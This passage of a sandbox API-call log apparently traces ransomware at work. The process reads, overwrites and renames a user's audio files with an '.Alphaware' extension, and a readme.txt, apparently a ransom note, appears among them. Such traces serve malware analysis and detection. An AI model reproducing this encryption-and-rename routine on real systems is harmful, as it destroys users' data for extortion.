lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rSuF1L1G3gyu.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rsuf1l1g3gyu.m4a.alphaware")) returned 1 [0087.313] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav", dwFileAttributes=0x80) returned 1 [0087.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rz3-_8o.wav"), fInfoLevelId=0x0, lpFileInformation=0x249f160 | out: lpFileInformation=0x249f160*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x928c0660, ftCreationTime.dwHighDateTime=0x1d975de, ftLastAccessTime.dwLowDateTime=0x256f3330, ftLastAccessTime.dwHighDateTime=0x1d9760c, ftLastWriteTime.dwLowDateTime=0x256f3330, ftLastWriteTime.dwHighDateTime=0x1d9760c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0087.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.314] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rz3-_8o.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.314] ReadFile (in: hFile=0x254, lpBuffer=0x249f388, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x249f388*, lpNumberOfBytesRead=0x23ea98*=0x10000, lpOverlapped=0x0) returned 1 [0087.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.337] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rz3-_8o.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rz3-_8o.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x928c0660, ftCreationTime.dwHighDateTime=0x1d975de, ftLastAccessTime.dwLowDateTime=0x256f3330, ftLastAccessTime.dwHighDateTime=0x1d9760c, ftLastWriteTime.dwLowDateTime=0x86419280, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15634)) returned 1 [0087.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.341] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rz3-_8o.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\rZ3-_8o.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\rz3-_8o.wav.alphaware")) returned 1 [0087.341] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3", dwFileAttributes=0x80) returned 1 [0087.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.342] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\t3tmvjxbaajh1k.mp3"), fInfoLevelId=0x0, lpFileInformation=0x255cc40 | out: lpFileInformation=0x255cc40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x54b89560, ftCreationTime.dwHighDateTime=0x1d973b8, ftLastAccessTime.dwLowDateTime=0x68bd07a0, ftLastAccessTime.dwHighDateTime=0x1d97645, ftLastWriteTime.dwLowDateTime=0x68bd07a0, ftLastWriteTime.dwHighDateTime=0x1d97645, nFileSizeHigh=0x0, nFileSizeLow=0x9929)) returned 1 [0087.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.342] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\t3tmvjxbaajh1k.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.342] ReadFile (in: hFile=0x254, lpBuffer=0x255cea8, nNumberOfBytesToRead=0x9929, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x255cea8*, lpNumberOfBytesRead=0x23ea98*=0x9929, lpOverlapped=0x0) returned 1 [0087.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.409] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\t3tmvjxbaajh1k.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.413] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\t3tmvjxbaajh1k.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b89560, ftCreationTime.dwHighDateTime=0x1d973b8, ftLastAccessTime.dwLowDateTime=0x68bd07a0, ftLastAccessTime.dwHighDateTime=0x1d97645, ftLastWriteTime.dwLowDateTime=0x864d7960, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcd08)) returned 1 [0087.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.413] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\t3tmvjxbaajh1k.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\t3tMVJXbAaJh1K.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\t3tmvjxbaajh1k.mp3.alphaware")) returned 1 [0087.413] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav", dwFileAttributes=0x80) returned 1 [0087.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.414] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\zmtegoau5-f.wav"), fInfoLevelId=0x0, lpFileInformation=0x23d3758 | out: lpFileInformation=0x23d3758*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x44548380, ftCreationTime.dwHighDateTime=0x1d967f8, ftLastAccessTime.dwLowDateTime=0xf87f0c80, ftLastAccessTime.dwHighDateTime=0x1d9700a, ftLastWriteTime.dwLowDateTime=0xf87f0c80, ftLastWriteTime.dwHighDateTime=0x1d9700a, nFileSizeHigh=0x0, nFileSizeLow=0xf36e)) returned 1 [0087.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.414] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\zmtegoau5-f.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.414] ReadFile (in: hFile=0x254, lpBuffer=0x23d39a0, nNumberOfBytesToRead=0xf36e, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23d39a0*, lpNumberOfBytesRead=0x23ea98*=0xf36e, lpOverlapped=0x0) returned 1 [0087.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.435] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\zmtegoau5-f.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\zmtegoau5-f.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44548380, ftCreationTime.dwHighDateTime=0x1d967f8, ftLastAccessTime.dwLowDateTime=0xf87f0c80, ftLastAccessTime.dwHighDateTime=0x1d9700a, ftLastWriteTime.dwLowDateTime=0x864fdac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14560)) returned 1 [0087.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.440] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\zmtegoau5-f.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\5jdQ8S\\zMtEGOAU5-f.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\5jdq8s\\zmtegoau5-f.wav.alphaware")) returned 1 [0087.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0087.440] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6ccc5e0, ftCreationTime.dwHighDateTime=0x1d97188, ftLastAccessTime.dwLowDateTime=0x864fdac0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x864fdac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.440] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df35750, ftCreationTime.dwHighDateTime=0x1d9688b, ftLastAccessTime.dwLowDateTime=0x57dc6eb0, ftLastAccessTime.dwHighDateTime=0x1d972c8, ftLastWriteTime.dwLowDateTime=0x8629c4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11534, dwReserved0=0x0, dwReserved1=0x0, cFileName="bgaF98m.mp3.Alphaware", cAlternateFileName="BGAF98~1.ALP")) returned 1 [0087.440] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bc00750, ftCreationTime.dwHighDateTime=0x1d97338, ftLastAccessTime.dwLowDateTime=0xf16ec1e0, ftLastAccessTime.dwHighDateTime=0x1d9764c, ftLastWriteTime.dwLowDateTime=0x86334a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x215e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hX1YQpkZK 4fEglyKr.mp3.Alphaware", cAlternateFileName="HX1YQP~1.ALP")) returned 1 [0087.441] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8629c4c0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8629c4c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8629c4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0087.441] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99135fa0, ftCreationTime.dwHighDateTime=0x1d96ce3, ftLastAccessTime.dwLowDateTime=0xb15f7f90, ftLastAccessTime.dwHighDateTime=0x1d97403, ftLastWriteTime.dwLowDateTime=0x863ccfc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8de0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rSuF1L1G3gyu.m4a.Alphaware", cAlternateFileName="RSUF1L~1.ALP")) returned 1 [0087.441] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x928c0660, ftCreationTime.dwHighDateTime=0x1d975de, ftLastAccessTime.dwLowDateTime=0x256f3330, ftLastAccessTime.dwHighDateTime=0x1d9760c, ftLastWriteTime.dwLowDateTime=0x86419280, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15634, dwReserved0=0x0, dwReserved1=0x0, cFileName="rZ3-_8o.wav.Alphaware", cAlternateFileName="RZ3-_8~1.ALP")) returned 1 [0087.441] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b89560, ftCreationTime.dwHighDateTime=0x1d973b8, ftLastAccessTime.dwLowDateTime=0x68bd07a0, ftLastAccessTime.dwHighDateTime=0x1d97645, ftLastWriteTime.dwLowDateTime=0x864d7960, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcd08, dwReserved0=0x0, dwReserved1=0x0, cFileName="t3tMVJXbAaJh1K.mp3.Alphaware", cAlternateFileName="T3TMVJ~1.ALP")) returned 1 [0087.441] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44548380, ftCreationTime.dwHighDateTime=0x1d967f8, ftLastAccessTime.dwLowDateTime=0xf87f0c80, ftLastAccessTime.dwHighDateTime=0x1d9700a, ftLastWriteTime.dwLowDateTime=0x864fdac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14560, dwReserved0=0x0, dwReserved1=0x0, cFileName="zMtEGOAU5-f.wav.Alphaware", cAlternateFileName="ZMTEGO~1.ALP")) returned 1 [0087.441] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44548380, ftCreationTime.dwHighDateTime=0x1d967f8, ftLastAccessTime.dwLowDateTime=0xf87f0c80, ftLastAccessTime.dwHighDateTime=0x1d9700a, ftLastWriteTime.dwLowDateTime=0x864fdac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14560, dwReserved0=0x0, dwReserved1=0x0, cFileName="zMtEGOAU5-f.wav.Alphaware", cAlternateFileName="ZMTEGO~1.ALP")) returned 0 [0087.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0087.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0087.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34bc6ee0, ftCreationTime.dwHighDateTime=0x1d96a07, ftLastAccessTime.dwLowDateTime=0xc1773de0, ftLastAccessTime.dwHighDateTime=0x1d96df6, ftLastWriteTime.dwLowDateTime=0xc1773de0, ftLastWriteTime.dwHighDateTime=0x1d96df6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea934470, ftCreationTime.dwHighDateTime=0x1d970bd, ftLastAccessTime.dwLowDateTime=0x508d70b0, ftLastAccessTime.dwHighDateTime=0x1d97515, ftLastWriteTime.dwLowDateTime=0x508d70b0, ftLastWriteTime.dwHighDateTime=0x1d97515, nFileSizeHigh=0x0, nFileSizeLow=0xd7e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ucxK0MmIS9f.mp3", cAlternateFileName="7UCXK0~1.MP3")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27495620, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0xac8990b0, ftLastAccessTime.dwHighDateTime=0x1d97678, ftLastWriteTime.dwLowDateTime=0xac8990b0, ftLastWriteTime.dwHighDateTime=0x1d97678, nFileSizeHigh=0x0, nFileSizeLow=0x131a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="G5SxErXXVbP.m4a", cAlternateFileName="G5SXER~1.M4A")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x338b7fe0, ftCreationTime.dwHighDateTime=0x1d96c3f, ftLastAccessTime.dwLowDateTime=0x2ca4d490, ftLastAccessTime.dwHighDateTime=0x1d96d63, ftLastWriteTime.dwLowDateTime=0x2ca4d490, ftLastWriteTime.dwHighDateTime=0x1d96d63, nFileSizeHigh=0x0, nFileSizeLow=0x18246, dwReserved0=0x0, dwReserved1=0x0, cFileName="Is6Ew0Sgc3J0FKCDV.wav", cAlternateFileName="IS6EW0~1.WAV")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb52cdea0, ftCreationTime.dwHighDateTime=0x1d9769d, ftLastAccessTime.dwLowDateTime=0x9e5f290, ftLastAccessTime.dwHighDateTime=0x1d976a0, ftLastWriteTime.dwLowDateTime=0x9e5f290, ftLastWriteTime.dwHighDateTime=0x1d976a0, nFileSizeHigh=0x0, nFileSizeLow=0x12f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="k UEro1.mp3", cAlternateFileName="KUERO1~1.MP3")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9627e330, ftCreationTime.dwHighDateTime=0x1d9745c, ftLastAccessTime.dwLowDateTime=0x4efe81d0, ftLastAccessTime.dwHighDateTime=0x1d9749d, ftLastWriteTime.dwLowDateTime=0x4efe81d0, ftLastWriteTime.dwHighDateTime=0x1d9749d, nFileSizeHigh=0x0, nFileSizeLow=0xd6d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="q_JfZqnkZKS-.m4a", cAlternateFileName="Q_JFZQ~1.M4A")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80339c70, ftCreationTime.dwHighDateTime=0x1d97580, ftLastAccessTime.dwLowDateTime=0xd2ecf80, ftLastAccessTime.dwHighDateTime=0x1d975f1, ftLastWriteTime.dwLowDateTime=0xd2ecf80, ftLastWriteTime.dwHighDateTime=0x1d975f1, nFileSizeHigh=0x0, nFileSizeLow=0xe0ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="R1vLsowFVmI7.wav", cAlternateFileName="R1VLSO~1.WAV")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5667df20, ftCreationTime.dwHighDateTime=0x1d97641, ftLastAccessTime.dwLowDateTime=0xff280730, ftLastAccessTime.dwHighDateTime=0x1d97668, ftLastWriteTime.dwLowDateTime=0xff280730, ftLastWriteTime.dwHighDateTime=0x1d97668, nFileSizeHigh=0x0, nFileSizeLow=0x12d9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sRZM.m4a", cAlternateFileName="")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9c3170, ftCreationTime.dwHighDateTime=0x1d96965, ftLastAccessTime.dwLowDateTime=0xdb919bb0, ftLastAccessTime.dwHighDateTime=0x1d97285, ftLastWriteTime.dwLowDateTime=0xdb919bb0, ftLastWriteTime.dwHighDateTime=0x1d97285, nFileSizeHigh=0x0, nFileSizeLow=0xa675, dwReserved0=0x0, dwReserved1=0x0, cFileName="vGw-gK7bU.mp3", cAlternateFileName="VGW-GK~1.MP3")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9204120, ftCreationTime.dwHighDateTime=0x1d96e2c, ftLastAccessTime.dwLowDateTime=0xf46579d0, ftLastAccessTime.dwHighDateTime=0x1d97371, ftLastWriteTime.dwLowDateTime=0xf46579d0, ftLastWriteTime.dwHighDateTime=0x1d97371, nFileSizeHigh=0x0, nFileSizeLow=0x12bbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="VrH278.wav", cAlternateFileName="")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9179a90, ftCreationTime.dwHighDateTime=0x1d97597, ftLastAccessTime.dwLowDateTime=0x4c086d00, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x4c086d00, ftLastWriteTime.dwHighDateTime=0x1d97642, nFileSizeHigh=0x0, nFileSizeLow=0x13695, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZrE7dehuPYX5_4a02P.wav", cAlternateFileName="ZRE7DE~1.WAV")) returned 1 [0087.442] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0087.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0087.443] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3", dwFileAttributes=0x80) returned 1 [0087.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\7ucxk0mmis9f.mp3"), fInfoLevelId=0x0, lpFileInformation=0x24ad108 | out: lpFileInformation=0x24ad108*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xea934470, ftCreationTime.dwHighDateTime=0x1d970bd, ftLastAccessTime.dwLowDateTime=0x508d70b0, ftLastAccessTime.dwHighDateTime=0x1d97515, ftLastWriteTime.dwLowDateTime=0x508d70b0, ftLastWriteTime.dwHighDateTime=0x1d97515, nFileSizeHigh=0x0, nFileSizeLow=0xd7e4)) returned 1 [0087.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.443] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\7ucxk0mmis9f.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.444] ReadFile (in: hFile=0x254, lpBuffer=0x24ad360, nNumberOfBytesToRead=0xd7e4, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24ad360*, lpNumberOfBytesRead=0x23ea98*=0xd7e4, lpOverlapped=0x0) returned 1 [0087.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.465] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\7ucxk0mmis9f.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.469] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\7ucxk0mmis9f.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea934470, ftCreationTime.dwHighDateTime=0x1d970bd, ftLastAccessTime.dwLowDateTime=0x508d70b0, ftLastAccessTime.dwHighDateTime=0x1d97515, ftLastWriteTime.dwLowDateTime=0x86549d80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x120b4)) returned 1 [0087.469] SetThreadErrorMode (dwNewMode=0x0, 